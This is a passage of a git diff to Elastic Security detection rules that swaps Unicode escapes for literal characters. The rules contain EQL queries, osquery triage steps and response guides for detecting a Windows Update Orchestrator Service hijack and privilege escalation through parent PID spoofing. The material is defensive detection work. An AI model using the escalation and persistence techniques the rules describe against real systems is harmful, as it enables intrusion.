Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Persistence via Update Orchestrator Service Hijack\n\nWindows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020.\n\nThis rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.executable : \"C:\\\\Windows\\\\System32\\\\svchost.exe\" and\n process.parent.args : \"UsoSvc\" and\n not process.executable :\n (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\Packages\\\\*\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoClient.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotification.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotificationUx.exe\",\n \"?:\\\\Windows\\\\System32\\\\MusNotifyIcon.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerMgr.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\MoUsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\UsoCoreWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\UsoCoreWorker.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeC2RClient.exe\") and\n not process.name : (\"MoUsoCoreWorker.exe\", \"OfficeC2RClient.exe\")\n", "references": [ "https://github.com/irsl/CVE-2020-1313" @@ -63,7 +63,7 @@ ], "risk_score": 73, "rule_id": "265db8f5-fc73-4d0d-b434-6483b56372e2", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -100,7 +100,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_3.json b/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_3.json index d1d5ed6ef5d..35c50c195a0 100644 --- a/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_3.json +++ b/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_3.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Privileges Elevation via Parent Process PID Spoofing", - "query": "/* This rule is compatible with Elastic Endpoint only */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n /* process creation via seclogon */\n process.parent.Ext.real.pid \u003e 0 and\n\n /* PrivEsc to SYSTEM */\n user.id : \"S-1-5-18\" and\n\n /* Common FPs - evasion via hollowing is possible, should be covered by code injection */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\securityhealthsetup.exe\") and\n\n not process.parent.executable : \"?:\\\\Windows\\\\System32\\\\AtBroker.exe\" and\n\n not (process.code_signature.subject_name in\n (\"philandro Software GmbH\", \"Freedom Scientific Inc.\", \"TeamViewer Germany GmbH\", \"Projector.is, Inc.\",\n \"TeamViewer GmbH\", \"Cisco WebEx LLC\", \"Dell Inc\") and process.code_signature.trusted == true)\n", + "query": "/* This rule is compatible with Elastic Endpoint only */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n /* process creation via seclogon */\n process.parent.Ext.real.pid > 0 and\n\n /* PrivEsc to SYSTEM */\n user.id : \"S-1-5-18\" and\n\n /* Common FPs - evasion via hollowing is possible, should be covered by code injection */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\securityhealthsetup.exe\") and\n\n not process.parent.executable : \"?:\\\\Windows\\\\System32\\\\AtBroker.exe\" and\n\n not (process.code_signature.subject_name in\n (\"philandro Software GmbH\", \"Freedom Scientific Inc.\", \"TeamViewer Germany GmbH\", \"Projector.is, Inc.\",\n \"TeamViewer GmbH\", \"Cisco WebEx LLC\", \"Dell Inc\") and process.code_signature.trusted == true)\n", "references": [ "https://gist.github.com/xpn/a057a26ec81e736518ee50848b9c2cd6", "https://blog.didierstevens.com/2017/03/20/", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_4.json b/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_4.json index 088d94afbed..ee2fdb0d251 100644 --- a/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_4.json +++ b/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_4.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Privileges Elevation via Parent Process PID Spoofing", - "query": "/* This rule is compatible with Elastic Endpoint only */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n /* process creation via seclogon */\n process.parent.Ext.real.pid \u003e 0 and\n\n /* PrivEsc to SYSTEM */\n user.id : \"S-1-5-18\" and\n\n /* Common FPs - evasion via hollowing is possible, should be covered by code injection */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\securityhealthsetup.exe\") and\n\n not process.parent.executable : \"?:\\\\Windows\\\\System32\\\\AtBroker.exe\" and\n\n not (process.code_signature.subject_name in\n (\"philandro Software GmbH\", \"Freedom Scientific Inc.\", \"TeamViewer Germany GmbH\", \"Projector.is, Inc.\",\n \"TeamViewer GmbH\", \"Cisco WebEx LLC\", \"Dell Inc\") and process.code_signature.trusted == true)\n", + "query": "/* This rule is compatible with Elastic Endpoint only */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n /* process creation via seclogon */\n process.parent.Ext.real.pid > 0 and\n\n /* PrivEsc to SYSTEM */\n user.id : \"S-1-5-18\" and\n\n /* Common FPs - evasion via hollowing is possible, should be covered by code injection */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\securityhealthsetup.exe\") and\n\n not process.parent.executable : \"?:\\\\Windows\\\\System32\\\\AtBroker.exe\" and\n\n not (process.code_signature.subject_name in\n (\"philandro Software GmbH\", \"Freedom Scientific Inc.\", \"TeamViewer Germany GmbH\", \"Projector.is, Inc.\",\n \"TeamViewer GmbH\", \"Cisco WebEx LLC\", \"Dell Inc\") and process.code_signature.trusted == true)\n", "references": [ "https://gist.github.com/xpn/a057a26ec81e736518ee50848b9c2cd6", "https://blog.didierstevens.com/2017/03/20/", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_5.json b/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_5.json index 85bf15e76fc..99eabb3b395 100644 --- a/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_5.json +++ b/packages/security_detection_engine/kibana/security_rule/26b01043-4f04-4d2f-882a-5a1d2e95751b_5.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Privileges Elevation via Parent Process PID Spoofing", - "query": "/* This rule is compatible with Elastic Endpoint only */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n /* process creation via seclogon */\n process.parent.Ext.real.pid \u003e 0 and\n\n /* PrivEsc to SYSTEM */\n user.id : \"S-1-5-18\" and\n\n /* Common FPs - evasion via hollowing is possible, should be covered by code injection */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\securityhealthsetup.exe\") and\n /* Logon Utilities */\n not (process.parent.executable : \"?:\\\\Windows\\\\System32\\\\Utilman.exe\" and\n process.executable : (\"?:\\\\Windows\\\\System32\\\\osk.exe\",\n \"?:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"?:\\\\Windows\\\\System32\\\\Magnify.exe\")) and\n\n not process.parent.executable : \"?:\\\\Windows\\\\System32\\\\AtBroker.exe\" and\n\n not (process.code_signature.subject_name in\n (\"philandro Software GmbH\", \"Freedom Scientific Inc.\", \"TeamViewer Germany GmbH\", \"Projector.is, Inc.\",\n \"TeamViewer GmbH\", \"Cisco WebEx LLC\", \"Dell Inc\") and process.code_signature.trusted == true) and \n\n /* AM_Delta_Patch Windows Update */\n not (process.executable : (\"?:\\\\Windows\\\\System32\\\\MpSigStub.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\MpSigStub.exe\") and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\wuauclt.exe\", \n \"?:\\\\Windows\\\\SysWOW64\\\\wuauclt.exe\", \n \"?:\\\\Windows\\\\UUS\\\\Packages\\\\Preview\\\\*\\\\wuaucltcore.exe\", \n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\wuauclt.exe\", \n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\wuaucltcore.exe\", \n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\*\\\\wuaucltcore.exe\")) and\n not (process.executable : (\"?:\\\\Windows\\\\System32\\\\MpSigStub.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\MpSigStub.exe\") and process.parent.executable == null) and\n\n /* Other third party SW */\n not process.parent.executable :\n (\"?:\\\\Program Files (x86)\\\\HEAT Software\\\\HEAT Remote\\\\HEATRemoteServer.exe\",\n \"?:\\\\Program Files (x86)\\\\VisualCron\\\\VisualCronService.exe\",\n \"?:\\\\Program Files\\\\BinaryDefense\\\\Vision\\\\Agent\\\\bds-vision-agent-app.exe\",\n \"?:\\\\Program Files\\\\Tablet\\\\Wacom\\\\WacomHost.exe\",\n \"?:\\\\Program Files (x86)\\\\LogMeIn\\\\x64\\\\LogMeIn.exe\",\n \"?:\\\\Program Files (x86)\\\\EMC Captiva\\\\Captiva Cloud Runtime\\\\Emc.Captiva.WebCaptureRunner.exe\",\n \"?:\\\\Program Files\\\\Freedom Scientific\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome Remote Desktop\\\\*\\\\remoting_host.exe\",\n \"?:\\\\Program Files (x86)\\\\GoToAssist Remote Support Customer\\\\*\\\\g2ax_comm_customer.exe\")\n", + "query": "/* This rule is compatible with Elastic Endpoint only */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n /* process creation via seclogon */\n process.parent.Ext.real.pid > 0 and\n\n /* PrivEsc to SYSTEM */\n user.id : \"S-1-5-18\" and\n\n /* Common FPs - evasion via hollowing is possible, should be covered by code injection */\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\securityhealthsetup.exe\") and\n /* Logon Utilities */\n not (process.parent.executable : \"?:\\\\Windows\\\\System32\\\\Utilman.exe\" and\n process.executable : (\"?:\\\\Windows\\\\System32\\\\osk.exe\",\n \"?:\\\\Windows\\\\System32\\\\Narrator.exe\",\n \"?:\\\\Windows\\\\System32\\\\Magnify.exe\")) and\n\n not process.parent.executable : \"?:\\\\Windows\\\\System32\\\\AtBroker.exe\" and\n\n not (process.code_signature.subject_name in\n (\"philandro Software GmbH\", \"Freedom Scientific Inc.\", \"TeamViewer Germany GmbH\", \"Projector.is, Inc.\",\n \"TeamViewer GmbH\", \"Cisco WebEx LLC\", \"Dell Inc\") and process.code_signature.trusted == true) and \n\n /* AM_Delta_Patch Windows Update */\n not (process.executable : (\"?:\\\\Windows\\\\System32\\\\MpSigStub.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\MpSigStub.exe\") and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\wuauclt.exe\", \n \"?:\\\\Windows\\\\SysWOW64\\\\wuauclt.exe\", \n \"?:\\\\Windows\\\\UUS\\\\Packages\\\\Preview\\\\*\\\\wuaucltcore.exe\", \n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\wuauclt.exe\", \n \"?:\\\\Windows\\\\UUS\\\\amd64\\\\wuaucltcore.exe\", \n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\UUS\\\\*\\\\wuaucltcore.exe\")) and\n not (process.executable : (\"?:\\\\Windows\\\\System32\\\\MpSigStub.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\MpSigStub.exe\") and process.parent.executable == null) and\n\n /* Other third party SW */\n not process.parent.executable :\n (\"?:\\\\Program Files (x86)\\\\HEAT Software\\\\HEAT Remote\\\\HEATRemoteServer.exe\",\n \"?:\\\\Program Files (x86)\\\\VisualCron\\\\VisualCronService.exe\",\n \"?:\\\\Program Files\\\\BinaryDefense\\\\Vision\\\\Agent\\\\bds-vision-agent-app.exe\",\n \"?:\\\\Program Files\\\\Tablet\\\\Wacom\\\\WacomHost.exe\",\n \"?:\\\\Program Files (x86)\\\\LogMeIn\\\\x64\\\\LogMeIn.exe\",\n \"?:\\\\Program Files (x86)\\\\EMC Captiva\\\\Captiva Cloud Runtime\\\\Emc.Captiva.WebCaptureRunner.exe\",\n \"?:\\\\Program Files\\\\Freedom Scientific\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Chrome Remote Desktop\\\\*\\\\remoting_host.exe\",\n \"?:\\\\Program Files (x86)\\\\GoToAssist Remote Support Customer\\\\*\\\\g2ax_comm_customer.exe\")\n", "references": [ "https://gist.github.com/xpn/a057a26ec81e736518ee50848b9c2cd6", "https://blog.didierstevens.com/2017/03/20/", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_104.json b/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_104.json index a6ec4a3fd31..0a41e8599ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_104.json +++ b/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_104.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_105.json b/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_105.json index 6df640ed2b2..cb898fd3c41 100644 --- a/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_105.json +++ b/packages/security_detection_engine/kibana/security_rule/26edba02-6979-4bce-920a-70b080a7be81_105.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_101.json b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_101.json index 61128bd4314..27935babedd 100644 --- a/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_101.json +++ b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_101.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_102.json b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_102.json index acf3473a3f8..28fcbb73c58 100644 --- a/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/26f68dba-ce29-497b-8e13-b4fde1db5a2d_102.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_1.json b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_1.json index 74d2c65527d..7bfa2ebeaa0 100644 --- a/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_1.json +++ b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_1.json @@ -41,7 +41,7 @@ ], "risk_score": 21, "rule_id": "27071ea3-e806-4697-8abc-e22c92aa4293", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -68,7 +68,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_2.json b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_2.json index 81db9eb890f..1087861417f 100644 --- a/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_2.json +++ b/packages/security_detection_engine/kibana/security_rule/27071ea3-e806-4697-8abc-e22c92aa4293_2.json @@ -46,7 +46,7 @@ ], "risk_score": 21, "rule_id": "27071ea3-e806-4697-8abc-e22c92aa4293", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to 